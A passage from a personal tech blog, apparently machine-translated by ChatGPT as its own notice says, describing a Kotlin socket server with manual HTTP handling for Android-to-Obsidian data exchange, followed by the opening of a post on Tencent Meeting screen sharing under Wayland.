Above is a snippet depicting the creation of a socket server that listens on a specified port, handles incoming client connections, and delegates processing to separate threads for improved concurrency.

The subsequent realization of the limitation concerning running external scripts in the Obsidian environment using Templater led to the manual implementation of HTTP protocol communication to cater to data retrieval requirements within that context.

override fun run() {
try {
// Code for handling HTTP requests and responses
} catch (e: IOException) {
e.printStackTrace()
}
}

private fun parseQueryString(query: String?): Map<String, String> {
// Parsing the query string from the HTTP request
}

private fun sendSuccessResponse(outputStream: PrintWriter, result: SerializableResponse) {
// Sending a successful HTTP response with serialized data
}

The code snippet above demonstrates the processing of incoming HTTP requests by parsing the request, handling different paths, and sending appropriate responses back to the clients.

Overall, the combined use of socket communication and manual HTTP handling provides the necessary infrastructure to facilitate data exchange between the Android application and external systems while maintaining a balance between efficiency and functionality.

info

This Content is generated by ChatGPT and might be wrong / incomplete, refer to Chinese version if you find something wrong.

Wayland---腾讯会议屏幕共享解决方案

· 4 min read

Wayland - Tencent Meeting Screen Sharing Solution

During a team meeting, I tried to share my screen but only my mouse pointer was visible. In the end, it turned into using a robust phone camera solution, which was not ideal. After some searching, I found a relatively elegant (albeit twisted) solution, so I decided to document it briefly.